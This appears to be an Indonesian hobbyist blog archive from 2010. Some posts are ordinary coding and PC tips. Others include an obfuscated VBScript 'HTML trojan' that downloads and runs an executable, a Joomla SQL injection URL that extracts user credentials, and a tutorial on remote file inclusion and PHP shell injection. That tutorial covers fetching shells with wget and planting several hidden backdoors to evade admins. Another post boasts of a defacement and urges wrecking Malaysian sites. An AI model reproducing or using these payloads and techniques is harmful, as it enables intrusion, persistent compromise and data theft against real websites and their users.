Rabu, 29 Desember 2010
Senin, 13 September 2010
FirePHP
Semua data dikirim melalui serangkaian respon header X-FirePHP-Data. Ini berarti bahwa data debug tidak akan mengganggu. Jadi FirePHP cocok untuk pengembangan AJAX dimana JSON atau XML memerlukan respon yang bersih.
<?php
require('FirePHPCore/fb.php')
/* NOTE: You must have Output Buffering enabled via
ob_start() or output_buffering ini directive. */
fb('Hello World'); /* Defaults to FirePHP::LOG */
fb('Log message' ,FirePHP::LOG);
fb('Info message' ,FirePHP::INFO);
fb('Warn message' ,FirePHP::WARN);
fb('Error message',FirePHP::ERROR);
fb('Message with label','Label',FirePHP::LOG);
fb(array('key1'=>'val1',
'key2'=>array(array('v1','v2'),'v3')),
'TestArray',FirePHP::LOG);
function test($Arg1) {
throw new Exception('Test Exception');
}
try {
test(array('Hello'=>'World'));
} catch(Exception $e) {
/* Log exception including stack trace & variables */
fb($e);
}
fb(array('2 SQL queries took 0.06 seconds',array(
array('SQL Statement','Time','Result'),
array('SELECT * FROM Foo','0.02',array('row1','row2')),
array('SELECT * FROM Bar','0.04',array('row1','row2'))
)),FirePHP::TABLE);
?>
Sumber
Selasa, 31 Agustus 2010
Shell Script Untuk Mendapatkan Informasi data center, IP pemilik, Kota dan Negara Dari Nama Domain
#!/bin/bash
# A sample shell script to print domain ip address hosting information such as
# Location of server, city, ip address owner, country and network range.
# This is useful to track spammers or research purpose.
# -------------------------------------------------------------------------
# Copyright (c) 2006 nixCraft project <http://cyberciti.biz/fb/>
# This script is licensed under GNU GPL version 2.0 or above
# -------------------------------------------------------------------------
# This script is part of nixCraft shell script collection (NSSC)
# Visit http://bash.cyberciti.biz/ for more information.
# -------------------------------------------------------------------------
# Last updated on Mar/05/2010
# -------------------------------------------------------------------------
# Get all domains
_dom=$@
# Die if no domains are given
[ $# -eq 0 ] && { echo "Usage: $0 domain1.com domain2.com ..."; exit 1; }
for d in $_dom
do
_ip=$(host $d | grep 'has add' | head -1 | awk '{ print $4}')
[ "$_ip" == "" ] && { echo "Error: $d is not valid domain or dns error."; continue; }
echo "Getting information for domain: $d [ $_ip ]..."
whois "$_ip" | egrep -w 'OrgName:|City:|Country:|OriginAS:|NetRange:'
echo ""
done
Jalankan script berikut ini :
./script.sh cyberciti.biz google.comContoh yang keluar:
SumberGetting information for domain: cyberciti.biz [ 74.86.48.99 ]...
OrgName: SoftLayer Technologies Inc.
City: Dallas
Country: US
NetRange: 74.86.0.0 - 74.86.255.255
OriginAS: AS36351
Getting information for domain: google.com [ 209.85.231.104 ]...
OrgName: Google Inc.
City: Mountain View
Country: US
NetRange: 209.85.128.0 - 209.85.255.255
Selasa, 10 Agustus 2010
Bingung, apa ni ya Maksudnya??
password generated with Wordpress
technology?
how to decrypt?
for example:
admin:$P$9UNhia0YtfZBjpIxbzHZMsuL.SXrU9.
habis tu ada yang jawab kayak gni :
Someone correct me or confirm this please.
<?php
class PasswordHash {
var $itoa64;
var $iteration_count_log2;
var $portable_hashes;
var $random_state;
function PasswordHash($iteration_count_log2, $portable_hashes)
{
$this->itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';
if ($iteration_count_log2 < 4 || $iteration_count_log2 > 31)
$iteration_count_log2 = 8;
$this->iteration_count_log2 = $iteration_count_log2;
$this->portable_hashes = $portable_hashes;
$this->random_state = microtime() . uniqid(rand(), TRUE); // removed getmypid() for compability reasons
}
function get_random_bytes($count)
{
$output = '';
if ( @is_readable('/dev/urandom') &&
($fh = @fopen('/dev/urandom', 'rb'))) {
$output = fread($fh, $count);
fclose($fh);
}
if (strlen($output) < $count) {
$output = '';
for ($i = 0; $i < $count; $i += 16) {
$this->random_state =
md5(microtime() . $this->random_state);
$output .=
pack('H*', md5($this->random_state));
}
$output = substr($output, 0, $count);
}
return $output;
}
function encode64($input, $count)
{
$output = '';
$i = 0;
do {
$value = ord($input[$i++]);
$output .= $this->itoa64[$value & 0x3f];
if ($i < $count)
$value |= ord($input[$i]) << 8;
$output .= $this->itoa64[($value >> 6) & 0x3f];
if ($i++ >= $count)
break;
if ($i < $count)
$value |= ord($input[$i]) << 16;
$output .= $this->itoa64[($value >> 12) & 0x3f];
if ($i++ >= $count)
break;
$output .= $this->itoa64[($value >> 18) & 0x3f];
} while ($i < $count);
return $output;
}
function gensalt_private($input)
{
$output = '$P$';
$output .= $this->itoa64[min($this->iteration_count_log2 +
((PHP_VERSION >= '5') ? 5 : 3), 30)];
$output .= $this->encode64($input, 6);
return $output;
}
function crypt_private($password, $setting)
{
$output = '*0';
if (substr($setting, 0, 2) == $output)
$output = '*1';
if (substr($setting, 0, 3) != '$P$')
return $output;
$count_log2 = strpos($this->itoa64, $setting[3]);
if ($count_log2 < 7 || $count_log2 > 30)
return $output;
$count = 1 << $count_log2;
$salt = substr($setting, 4, 8);
if (strlen($salt) != 8)
return $output;
if (PHP_VERSION >= '5') {
$hash = md5($salt . $password, TRUE);
do {
$hash = md5($hash . $password, TRUE);
} while (--$count);
} else {
$hash = pack('H*', md5($salt . $password));
do {
$hash = pack('H*', md5($hash . $password));
} while (--$count);
}
$output = substr($setting, 0, 12);
$output .= $this->encode64($hash, 16);
return $output;
}
function gensalt_extended($input)
{
$count_log2 = min($this->iteration_count_log2 + 8, 24);
# This should be odd to not reveal weak DES keys, and the
# maximum valid value is (2**24 - 1) which is odd anyway.
$count = (1 << $count_log2) - 1;
$output = '_';
$output .= $this->itoa64[$count & 0x3f];
$output .= $this->itoa64[($count >> 6) & 0x3f];
$output .= $this->itoa64[($count >> 12) & 0x3f];
$output .= $this->itoa64[($count >> 18) & 0x3f];
$output .= $this->encode64($input, 3);
return $output;
}
function gensalt_blowfish($input)
{
$itoa64 = './ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
$output = '$2a$';
$output .= chr(ord('0') + $this->iteration_count_log2 / 10);
$output .= chr(ord('0') + $this->iteration_count_log2 % 10);
$output .= '
$i = 0;
do {
$c1 = ord($input[$i++]);
$output .= $itoa64[$c1 >> 2];
$c1 = ($c1 & 0x03) << 4;
if ($i >= 16) {
$output .= $itoa64[$c1];
break;
}
$c2 = ord($input[$i++]);
$c1 |= $c2 >> 4;
$output .= $itoa64[$c1];
$c1 = ($c2 & 0x0f) << 2;
$c2 = ord($input[$i++]);
$c1 |= $c2 >> 6;
$output .= $itoa64[$c1];
$output .= $itoa64[$c2 & 0x3f];
} while (1);
return $output;
}
function HashPassword($password)
{
$random = '';
if (CRYPT_BLOWFISH == 1 && !$this->portable_hashes) {
$random = $this->get_random_bytes(16);
$hash =
crypt($password, $this->gensalt_blowfish($random));
if (strlen($hash) == 60)
return $hash;
}
if (CRYPT_EXT_DES == 1 && !$this->portable_hashes) {
if (strlen($random) < 3)
$random = $this->get_random_bytes(3);
$hash =
crypt($password, $this->gensalt_extended($random));
if (strlen($hash) == 20)
return $hash;
}
if (strlen($random) < 6)
$random = $this->get_random_bytes(6);
$hash =
$this->crypt_private($password,
$this->gensalt_private($random));
if (strlen($hash) == 34)
return $hash;
return '*';
}
function CheckPassword($password, $stored_hash)
{
$hash = $this->crypt_private($password, $stored_hash);
if ($hash[0] == '*')
$hash = crypt($password, $stored_hash);
return $hash == $stored_hash;
}
}
?>
^code used to generate the hash, may not be the same as your version but ya...
<?php
$wp_hasher = new PasswordHash(8, TRUE);
$password_hashed = '$P$B55D6LjfHDkINU5wF.v2BuuzO0/XPk/';
$plain_password = 'test';
if($wp_hasher->CheckPassword($plain_password, $password_hashed)) {
echo "YES, Matched";
}
else {
echo "No, Wrong Password";
}
?>
^code from wordpress that can be modified to brute a password, just a fyi lol
That should be everything you need :D
habis itu aku bingung banget apa tu maksud dari jawaban orang tu ya,,....
soalnya bahasa inggris minim banget, jdi ya agak bingung,,,,...
Anti Trojan Elite
Anti Trojan Elite dapat mendeteksi lebih dari 35.000 trojan, worm dan keyloggers.
Anti Trojan Elite memiliki beberapa Utility:
- The network utility [AD] : Dapat digunakan untuk memutuskan koneksi TCP yang mencurigakan.
- The process utility : Dapat digunakan untuk membunuh proses yang mencurigakan bahkan proses memiliki sistem priviage, bahkan memiliki kemampuan untuk membongkar modul mencurigakan dalam semua proses.
- The registry repair utility : Dapat digunakan untuk memperbaiki registri diubah oleh malware.
- The registry monitor utility : Dapat digunakan untuk memperbaiki perubahan dari kunci registri penting dan nilai-nilai dengan real time.
Download :
Anti Trojan Elite
Download :
Trojan Remover
Html Trojan
on error resume next
dl = "www.site.com/trojan.exe"
Set df = ********.createElement("o bject")
cls1="clsid:BD96"
cls2="C556-65A"
cls3="3-11D0-9"
cls4="83A-00C04FC29E36"
clsfull=cls1&cls2&cls3&cl s4
df.setAttribute "classid",clsfull
strr1="Mic"
strr2="roso"
strr3="ft."
strr4="XML"
strr5="HTTP"
strr=strr1&strr2&strr3&st rr4&strr5
Set x = df.CreateObject(strr,"")
ab1="A"
ab2="dod"
ab3="b.S"
ab4="t"
ab5="re"
ab6="am"
strb1=ab1&ab2&ab3&ab4&ab5 &ab6
strb5=strb1
set YY = df.createobject(strb5,"")
YY.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fnamezz1="update.exe"
scripp1="Scrip"
scripp2="ting"
scripp3=".Fil"
scripp4="eSyste"
scripp5="mObject"
scripp=scripp1&scripp2&sc ripp3&scripp4&scripp5
set FF = df.createobject(scripp,"" )
set tmp = F.GetSpecialFolder(2)
fnamezz1= FF.BuildPath(tmp,fnamezz1 )
YY.open
YY.write x.responseBody
YY.savetofile fnamezz1,2
YY.close
set MM = df.createobject("Shell.Ap plication","")
MM.ShellExecute fnamezz1,"","","open",0
</ s c r i p t >
</BODY>
</HTML></body></html></script>
Sqlmap 0.5 - Automated SQL Injection Tool
* Full support for MySQL, Oracle, PostgreSQL and Microsoft SQL Server database management system back-end.
* Can also identify Microsoft Access, DB2, Informix and Sybase;
* Extensive database management system back-end fingerprint based upon:
- Inband DBMS error messages
- DBMS banner parsing
- DBMS functions output comparison
- DBMS specific features such as MySQL comment injection
- Passive SQL injection fuzzing
* It fully supports two SQL injection techniques:
- Blind SQL injection, also known as Inference SQL injection
- Inband SQL injection, also known as UNION query SQL injection
Download : sqlmap 0.5
Joomla Component (com_youtube) SQL Injection Vulnerability
inurl:"com_youtube"
##################################################
===[ Exploit ]===
http://www.site.com/index.php?option=com_youtube&id_cate=4
union+select+1,concat(username,0x3a,email),3,4,5,6,7,8+from+jos_users--
or
http://www.site.com/index.php?option=com_youtube&id_cate=55
union+select+1,concat(username,0x3a,email),3,4,5,6,7,8+from+jos_users--
##################################################
Senin, 09 Agustus 2010
Joomla Component SQL Injection Vulnerability
Minggu, 01 Agustus 2010
Remove Element from array
Kode ini menghapus elemen dari sebuah array, kita bisa memasukkan salah satu kunci atau nilai dari elemen yang ingin kita hapus :
<?
$arr[]="abdy";
$arr[]='andy';
$arr[]='elis';
$arr[]='budiono';
$arr[]='Isa';
unset_arr($arr,"key","9");
function unset_arr($arr, $searchField="value",$value)
{
echo "Array 1:= ";print_r($arr);
if($searchField=="key")
{
if(array_key_exists($value,$arr))
{
echo "Key= $key is unset....!";
}
else
echo "Key=$value is not exist in array<br />";
}
else
{
$found=array_search($value,$arr);
if($found!="") unset($arr[$found]);
else
echo "Given value is not exist in array.....!<br />";
}
echo "<br />";
$arr=array_values($arr);
echo "Array Result==";
print_r($arr);
return $arr;
}
?>
Moga bermanfaat,,, :) :)
Senin, 12 Juli 2010
PYTHON HYPERSCHEMA 3.0
Petunjuk ada di file README disertakan dengan zip dan Tgz.
Sumber : Hyperschema
Jumat, 09 Juli 2010
Background color Link
<a href="link.htm" onMouseOver="document.bgColor='#ffffff'">Link Text</a>
<a href="link.htm" onMouseOut="document.bgColor='#00ff00'">Link Text</a>
<a href="link.htm" onClick="document.bgColor='#0000ff'">Link Text</a>
<a href="link.htm" onMouseOver="document.bgColor='#ff0000'"> onMouseOut="document.bgColor='#00ff00'">Link Text</a>
<a href="link.htm" onMouseOver="document.bgColor='#ffff00'" onMouseOut="document.bgColor='#00ff00'" onClick="document.bgColor='#0000ff'">Link Text</a>
<a href="link.htm" onMouseOver="document.bgColor='#ffffff'">Link Text</a>
Menjadi :
<a href="http://geoweek.wordpress.com" onMouseOver="document.bgColor='#ffffff'">Geoweek</a>
Untuk kode warna Background yg brwarna merah bisa kita ganti sesuai dgn warna kesukaan kita...
Kamis, 08 Juli 2010
Tips Membuat Aplikasi PHP Yang Aman
Vulnerabilities atau kelemahan keamanan pada aplikasi berbasis web menggunakan PHP merupakan hal yang tak habis-habisnya dibahas. Tulisan kali ini berisi tip dan trik membuat aplikasi PHP yang aman.
* Perhatikan Register Global selalu dalam kondisi OFF.
Berikut contoh kelemahan keamanan yang disebabkan oleh kesalahan dalam penulisan script yang mengakibatkan penyerang dapat dengan mudah memanfaatkan register global berkondisi on.
[php]
// lokasi script: http://localhost/login.php
// script login yang dipanggil dari sebuah form untuk masuk kedalam halaman Admin
// set variable $oke manjadi true jika autentifikasi sukses
if (authentifikasi($_POST['user'],$_POST['password']) {
$oke=true;
}
if ($oke) {
// masuk ke halaman admin
}
[/php]
Bagaimana memperbaiki script diatas? Anda cukup menambahkan inisialisasi diawal seperti berikut:
[php num=5]
// Inisialisasi variable $oke
$oke=false;
if (authentifikasi($_POST['user'],$_POST['password']) {
$oke=true;
}
[/php]
atau
[php num=5]
if (authentifikasi($_POST['user'],$_POST['password']) {
$oke=true;
} else { // jika authentifikasi gagal, set variable $oke menjadi false
$oke=false;
}
[/php]
Senin, 28 Juni 2010
Webshell
Contoh simple:
Cyberweb:~ cyberWeb$ pwd
/Users/cyberweb
Selasa, 18 Mei 2010
Gara2 maen Depes..
tiba waktu hajar situs ini : http://___.eu/
ini mirrorny :
http://indonesiandefacer.org/mirror/2010/05/rn4cast.html
FB ku langsung di Add sama yg punya sever situs itu, orang itu namanya "Tom Standaert" dy katanya orang Belgium, tpi aku gk curiga kalau orang itu adalah yang punya sever situs itu, habis itu ya terjadilah obrolan2 di FB saling bales Coment. Berikut ini adalah obrolanku sama yg punya sever situs itu :
KidDevilz Hde : thanks for the add,,, ^_^, where are you from??
Monday at 11:06pm · Comment · Like · See Wall-to-Wall
Tom Standaert : Belgium. Nice to meet you.
Apparently you hacked a website hosted one one of my servers :p
Backups, so no harm done.
It was http://www._____.eu/
Not sure if it was really you off course. It was signed
KidDevilz
.::Hacked By KidDevilz::.
With a reference to HDE.
Ring a bell? I noticed the apache allowed .inc files and also found several other vulnerabilities, but my main concern is that this website runs a -very early- version of an open source generic CMS system I'm developing, and maybe there might be a serious security hole I missed.
Although I'm aware of several in this version of the program.
Regards,
Tom
Yesterday at 2:38am
Tom Standaert : ok, found it on your wall - yesterday 0:38
care to share how?
SQL injection, the inc files , php injection?
Yesterday at 2:59am
Tom Standaert : by the way: it 's a non-profit organisation for whom I work for free, so not a very nice thing to delete their data ;)
Yesterday at 3:38am
KidDevilz Hde : yea, indeed my actions at the site was hacked, but I did not destroy or delete all the files that exist on the site, just tells me that the site was still a hole Gap ...
I only use SQL injection..
I apologize if less polite ...
I am glad to be your acquaintance same..
Yesterday at 5:08am ·
Tom Standaert : no problem, and as I said, no real harm was done, only some data in the mysql replaced.
I was just wondering how you did it. It was build fast because I did it for free, so I'm aware there might be several severe security holes.
Could you give me some more details on where exactly the huge gap is?
Yesterday at 5:16am
KidDevilz Hde : I only use sql-injection,,,,
if I may I help you, then I will tell you how Patch Technique Common Simple Web Attack ..
but I want to go to bed, because I was sleepy heavy ...... See More
had two days I did not sleep ..
I'll send to your facebook message ..
Yesterday at 5:26am ·
Karena aku udah ngantuk berat jadi ya gak aku lanjutin ngobrol2nya sama org tu...
dari pada ilang obrolan itu makanya aku buat update d blogku tercinta ini, buat kenang2an,,
Buat temen2 yg suka maen depes2n, jangan mendelet semua file yg da d situs itu..
Tpi kalau situsnya Malingsial Hancurkan ja sampek ke akar2nya sampek Down, pokok nya jangan d kasih ampun buat Malingsial...
.::| Salam UnderGround |::.
Rabu, 12 Mei 2010
3 'Jagoan' IT Tanpa Bekal Ijazah
Tahukah anda bila nama-nama besar seperti pendiri Microsoft, Bill Gates, pendiri Apple Steve Jobs, dan Pendiri Facebook, Mark Zuckerberg meraih sukses tanpa berbekal ijazah dari tempat kuliah masing-masing.
Gates bahkan dikenal sebagai orang paling sukses yang dikeluarkan dari kampusnya di Harvard University. Suami dari Mellinda ini, masuk Harvard di tahun 1973, tapi dua tahun kemudian keluar dari kampus dan bersama temannya Paul Allen ia mendirikan Microsoft.
Pria yang pernah dinobatkan dalam jajaran pria terkaya dunia selama satu dekade itu, akhirnya mendapat gelar Doktor Honoris Clausa dari bekas kampusnya di tahun 2007. "Mungkin saya membawa pengaruh yang buruk," canda Gates.
Jagoan IT berikutnya, Steve Jobs diketahui drop out dari Reed College. Ia hanya duduk di kampus tersebut kurang lebih enam bulan. setelah itu ia fokus untuk mendirikan Apple, neXT Computer dan Pixar. Karya-karyanya telah mempengaruhi pengembangan dunia komputer di Dunia.
Seolah mengikuti jejak kakak tingkatnya, pendiri Facebook Mark Zuckerberg juga meninggalkan bangku kampusnya di Harvard. Tapi situs jejaring pertemanannya yang dikembangkannya telah membius jutaan orang di dunia dan menghasilkan uang setidaknya sekira USD4 juta.
Diluar nama-nama 'jagoan' IT tersebut, juga banyak bintang terkenal yang juga meraih kesuksesan tanpa berbekal ijazah perguruan tinggi, sebut saja aktor Tom Hanks, Harisson Ford, Lady Gaga, hingga James Cameron.
Kamis, 29 April 2010
Bikin Ngakak..
Berikut ini adalah gambar2nya :
Spesial terimakasih buat Priscyla Mariebeth dan Abang Mywisdom yang telah bikin aku tertawa ngakak sampek perutku sakit malem itu,,,,,,, =)) =)) =))
Kamis, 11 Maret 2010
Cara Aman Mengotak-atik Setting BIOS PC
Bila Windows adalah wajah ramah yang ditampilkan proyek-proyek komputer kepada dunia, maka BIOS adalah sisi gelap bawah sadar yang bertugas untuk berpikir. BIOS (Basic Input/Output System) adalah kode untuk fungsi-fungsi fundamental PC, seperti mengumpulkan ketukan tombol dari keyboard atau meletakkan pixel ke layar.
Terapi BIOS
Ketika teknologi baru muncul dan bug tua ditemukan, para pembuat komputer sering menerbitkan versi BIOS yang telah diupdate yang dapat mengatasi problem dan meningkatkan kinerja. Periksa situs Web pembuat PC Anda mengenai update terbaru. Namun pertama-tama pastikan Anda memiliki nomor versi terbaru BIOS; biasanya muncul sekilas di monitor Anda tepat setelah Anda menyalakan sistem. (Tekan tombol Pause bila kilasannya terlalu cepat.)
Mengupdate BIOS mudah, tetapi Anda harus melakukannya dengan hati-hati. Biasanya Anda perlu menjalankan program kecil dari floppy disk saja. Namun bila terjadi masalah, Anda hanya bisa meratapi motherboard yang tidak bisa lagi Anda gunakan. Jadi pastikan bahwa sebelumnya Anda telah membaca semua instruksi di file readme BIOS update. Dan selalu lakukan persis seperti apa yang petunjuk-petunjuk itu katakan.
Jika BIOS adalah bawah sadar PC, maka utiliti Setup merupakan fondasi untuk membangun karakter PC. Utiliti tersebut memiliki setting user untuk mengontrol harddisk, memori, kartu-kartu grafis, power saving, port USB, dan hardware lain. Program tersebut biasanya disertakan dalam disk, tetapi sekarang sudah tersimpan dalam chip ROM yang sama dengan BIOS PC.
Untuk membuka Setup, cukup tekan tombol (atau kombinasi tombol) yang disarankan kepada Anda untuk dimasukkan ketika PC melakukan start up. Masing-masing pembuat BIOS menggunakan tombol yang berbeda — Delete, F1, atau F10. Di layar Anda seharusnya memperlihatkan tombol atau tombol-tombol mana yang perlu ditekan untuk Setup tepat setelah layar menampilkan angka versi BIOS. Jika tidak, periksa dokumentasi sistem Anda.
Karena utiliti Setup dibuat oleh pembuat BIOS dan berada dalam chip yang sama dengan BIOS, ini sering disebut utiliti BIOS Setup. Dan karena utiliti ini menyimpan settingnya di chip clock/calendar — chip complementary metal-oxide semiconductor, atau CMOS — maka sering pula disebut sebagai program Setup CMOS. (Chip CMOS memiliki batere sendiri untuk memelihara setting chip sekalipun PC dimatikan.)
Utiliti Setup memiliki setting hardware yang berlimpah, mulai dari yang terlihat nyata, seperti setting waktu di clock PC, sampai yang tidak kelihatan, seperti jumlah “wait states” yang mengkoordinasi aliran data antara RAM dan CPU.
Pertama, Jangan Merusak
Ketika bekerja dengan utiliti Setup PC, gunakan petunjuk praktis yang sama diajarkan pada awal bedah otak: Bila Anda tidak tahu apa yang dilakukan sesuatu, jangan berurusan dengannya. Kecerobohan mengubah wait state atau setting lainnya dapat menurunkan kinerja atau bahkan menyebabkan sistem mengalami crash.
Jika Anda mengira Anda telah tanpa sengaja mengubah setting ketika sedang bekerja dengan utiliti Setup, segera berhenti dan mulailah dari awal lagi. Semua utiliti Setup memiliki pilihan menu yang memungkinkan Anda keluar tanpa menyimpan perubahan. Anda mungkin melihat pula pilihan untuk mengembalikan setting ke nilai defaultnya. Abaikan opsi ini: Bila vendor PC Anda telah melakukan fine-tune terhadap sistem, setting default si pembuat BIOS mungkin membuatnya menjadi tidak optimal.
Backup setting-setting Anda sebelum membuat perubahan. Bila batere yang menghidupi chip clock/calendar mati, setting-setting Anda mati bersamanya. Bila utiliti Setup Anda mempunyai opsi backup, gunakanlah. Jika tidak, catat setting di kertas — atau tekan key Print Screen untuk masing-masing layar di utiliti tersebut (tetapi ini tidak selalu berfungsi).
Apa yang Dicari
Sebelum mulai, baca sampai selesai user manual yang menyertai PC atau motherboard. Banyak manual menawarkan penjelasan singkat masing-masing setting. Setting bervariasi menurut manufaktur dan model, namun Anda seharusnya menemukan ini di hampir semua PC:
Optimalisasi dan kompatibilitas setting: Utiliti Setup sering berisi setting-setting untuk kinerja hardware. Kadang-kadang ini tidak diatur secara optimal di pabrik, utamanya pada PC yang dibuat berdasar pesanan atau generik. Scan seluruh program Setup. Setting modus AGP dan setting DMA merupakan kandidat utama untuk dioptimalisasi. Setting-setting ini juga berguna untuk troubleshooting hardware yang baru diinstall: Menonaktifkan atau menurunkan setting yang diberikan bisa memicu ketidak-kompatibelan kartu grafis, CD-ROM drive, atau peranti lain yang terjadi sebelumnya.
Setting harddisk: Anda akan menemukan tabel, biasanya pada halaman kedua atau Advanced dan dengan judul “IDE”, yang mendaftar semua parameter konfigurasi untuk EIDE harddisk yang secara langsung terkoneksi ke motherboard. (SCSI harddisk dan EIDE harddisk yang tidak punya kartu ekspansi akan menjalankan program konfigurasinya sendiri.) Sementara kebanyakan PC yang dibuat selama beberapa tahun terakhir dapat dengan mulus mendeteksi dan mengkonfigurasi harddisk baru, sebagian memerlukan instalasi manual. Baca your dokumentasi disk baru Anda mengenai prosedur tersebut dan gunakan opsi-opsi on-screen untuk membuat perubahan di tabel ini.
Floppy disk: Opsi ini memungkinkan Anda menyetel tipe floppy drive (3,5 inci, 1,44MB, sebagai contoh) yang telah Anda tetapkan sebagai drive A: atau B: Anda. Ini merupakan setting yang perlu diperiksa jika Anda mengalami problem floppy-drive. Sebagian utiliti Setup mempunyai setting sekuriti `Floppy Read only` tersendiri yang mencegah data Anda dituliskan ke floppy disk dan dihapus dari PC.
Urutan booting: Setting ini menentukan mana yang pertama kali dilihat PC ketika instruksi boot-up. Contoh: `A: kemudian C:`, `C: kemudian A:`, atau `C:, Zip drive`. Untuk booting dari CD-ROM drive, Zip, atau LS-120, Anda sepertinya harus mengubah setting ini.
Proteksi password: Bila ini diaktifkan, BIOS akan menanyakan password sebelum booting up. Sangat berhati-hatilah dengan yang satu ini: Bila melupakan password, Anda terpaksa mereset jumper motherboard atau mencopot batere CMOS, yang akan menyebabkan Anda kehilangan semua setting, atau Anda bahkan harus membeli motherboard baru.
Setting IRQ: Bila Anda butuh setting IRQ ekstra untuk hardware baru, Anda perlu membebaskan satu IRQ dengan menonaktifkan feature yang tidak digunakan, seperti port serial, port paralel, atau port USB.
Setting port paralel: Pilih modus yang paling cocok untuk hardware. Modus ECP atau EPP dapat sangat mempercepat printer dan peranti lain.
Kipas RPM dan temperatur CPU: Dua parameter kritis ini sebaiknya dicentang secara periodik untuk memastikan mereka berfungsi dengan benar.
Drive Kotor
Benah-benah di akhir minggu meninggalkan lapisan debu yang menutupi seluruh kantor, dan Anda kuaatir CD-RW drive Anda mungkin kotor. Bagaimana sebaiknya membersihkannya?
Mungkin sebaiknya tidak. Gosokan paling halus sekalipun dapat menghambat laser sensitif pada drive, jadi bila tidak rusak, jangan bersihkan. Bila kinerja menurun, atau bila drive Anda tidak mampu membaca medianya, coba beberapa semprotan yang diarahkan dengan baik dari kaleng semprotan udara. Pastikan menggunakan sedotan plastik yang menyertai kaleng. Dan jaga agar menyemprot pelan-pelan; desakan semprotan yang berlebihan dapat menyebabkan kondensasi yang menumpuk uap lembab pada interior drive.
Menghentikan Program Tua
Beberapa program software yang benar-benar tua hanya tidak sanggup berfungsi pada PC kecepatan tinggi sekarang ini. Jika Anda memiliki program kuno yang mengunci atau memunculkan pesan error setiap kali Anda hendak menjalankannya, cobalah CPUKiller; utiliti gratis dan mudah digunakan, yang memungkinkan Anda memperlambat PC sesedikit atau sebanyak Anda inginkan. Pergilah ke www.cpukiller.com untuk mendownloadnya.
Sumber : Ilmukomputer.com
Senin, 22 Februari 2010
Php shell Injection,Php Shell Backdooring,Patching
PHP Shell Injection ( Injeksi PHP ) itu afaan om?
PHP Injection, memasukan perintah-perintah shell langsung dengan menambahkan perintah PHP pada URL:
http://www.target.com/[path]/page.php?action=exit.passthru($_GET[cok]);exit&cok=wget http://xXx.co.cc/xXx/r00t
Yang bertulisan tebal itu perintah PHP-nya sedangkan yang bertulisan miring adalah perintah shellnya.
PHP Shell Injection-nya :
http://www.target.com/[path]/page.php?action=exit.include($_GET[cok]);exit&cok= [injekan??]
require_once($bcrm_pub_root . “/public_prepend.inc.php”)
PHP Shell Injection-nya :
http://www.target.com/browser_crm/pub/clients.php?bcrm_pub_root=[injekan??]
Setelah anda berhasil mendapatkan target berupa situs yang mempunyai kelemahan terhadap serangan RFI (Remote File Inclusion) dari proses scanning yang dilakukan oleh bot scan kamu sebelumnya, misalnya saja bot scan kamu menampilkan output seperti di bawah ini :
http://intruder.gmork.cz/forum//includes/usercp_sendpasswd.php?phpbb_root_path[user]=[evil code]
Lah mana PHP Shell Injector-nya??? Bagi donk!!!
Hare gene gak punya PHP Shell Injector….? hehehe
http://intruder.gmork.cz/forum//includes/usercp_sendpasswd.php?phpbb_root_path[user]=[evil code]
http://geocities.com/gara_013/injek.txt???
http://intruder.gmork.cz/forum//includes/usercp_sendpasswd.php?phpbb_root_path[user]=http://h1.ripway.com/newbe/kambe.txt?
Jangan lupa tanda tanya dibelakangnya harus ditambahkan. Setelah itu paste-kan hasil di atas ke browser lalu jalankan. Kalo browser menampilkan hasil seperti di bawah ini atau mungkin mirip (PHP Injektor memiliki tampilan berbeda-beda), maka selamat buat kamu, kamu telah melakukan yang namanya PHP SHELL INJECTION!
Hanya saja shell seperti di atas sifatnya masih hanya remote dari luar server dan kalau celah keamanannya telah diketahui oleh adminnya dan ditutup, maka kamu nggak bisa lagi mengaksesnya.
Wew, tenang.. tenang… bisa kita akalin biar lebih awet. Segala permasalahan pasti ada pemecahannya. Pada tahap inilah kita harus melakukan apa yang orang Arab bilang PHP SHELL BACKDOORING.
2. PHP SHELL BACKDOORING (Menanam Backdoor PHP)
- Landasan Teori
Backdoor adalah sebuah program ataupun hasil pengkodean yang memungkinkan seseorang dapat mengakses secara remote komputer korban (tempat backdoor ditanam). Bisa disebut juga sebagai ’jalan belakang’ untuk masuk ke komputer korban tanpa harus melalui form login.
Jadi dengan backdoor, kita tidak lagi mengakses shell di target dari luar (PHP Injection) melalui vulnerability lain seperti pada awal tutorial ini. Kita akan dapat mengakses komputer korban sekalipun celah keamanan tadi pun telah ditutup oleh adminnya. Nah, dalam tutor ini backdoor yang kita gunakan adalah PHP Shell backdoor. Backdoor ini adalah PHP Shell Injector itu sendiri (gampang kan?). Kalau bisa biasakanlah memakai backdoor yang berupa PHP Shell sederhana saja, jangan yang berat dan kompleks sejenis C99 dan R57, karena sangat mudah bagi admin target untuk menemukannya. Logikanya begini, kalau orang lain (bukan admin) saja bisa menemukan dengan mudah backdoor C99 atau R57 melalui google, apalagi admin target itu sendiri kan? Dan biasakan juga menanam lebih dari satu backdoor di tempat yang berbeda-beda pada sebuah target, dengan begitu apabila satu backdoor dihapus oleh admin, masih ada backdoor lain yang belum tentu ketahuan.
- Saatnya Beraksi!
find –perm –d /777
Kalau sudah, sekarang tinggal mendownload/transfer file backdoor (PHP Injector tadi) ke dalam target. Caranya seperti biasa menggunakan wget atau lwp-download seperti ini :
wget http://h1.ripway/newbe/kambe.txt kalo gak bisa coba lwp-download
Jika perintah itu sukses, maka lanjutkan dengan mengubah file PHP Shell tersebut, dalam hal ini kambe.txt menjadi file berekstensi PHP dengan perintah ini :
mv kambe.txt.txt .system.php
Kalau semua sudah dilakukan tanpa error seperti langkah-langkah di atas, maka selamat, kamu telah melakukan Backdooring!
Horeee… tapi gimana mengakses backdoor tadi om???
Teewwwww….
Oh iya… caranya adalah dengan mengakses alamat file backdoor tadi lewat browser .
Tapi alamat file backdoornya apa om???
Nah, alamat file backdoor tadi dapat diliat dengan cara :
/var/www/intruder/forum/db
http://intruder.gmork.cz/forum//includes/usercp_sendpasswd.php?phpbb_root_path[user]=http://h1.ripway.com/newbe/kambe.txt?
Sekarang tinggal kamu tes aja mengkases backdoor tersebut dari browser. Kalo hasilnya mengeluarkan tampilan shell seperti atau mirip gambar di bawah ini (masing-masing PHP backdoor berbeda-beda tampilan sama halnya dengan perbedaan PHP Injector), berarti semua berjalan dengan lancar :
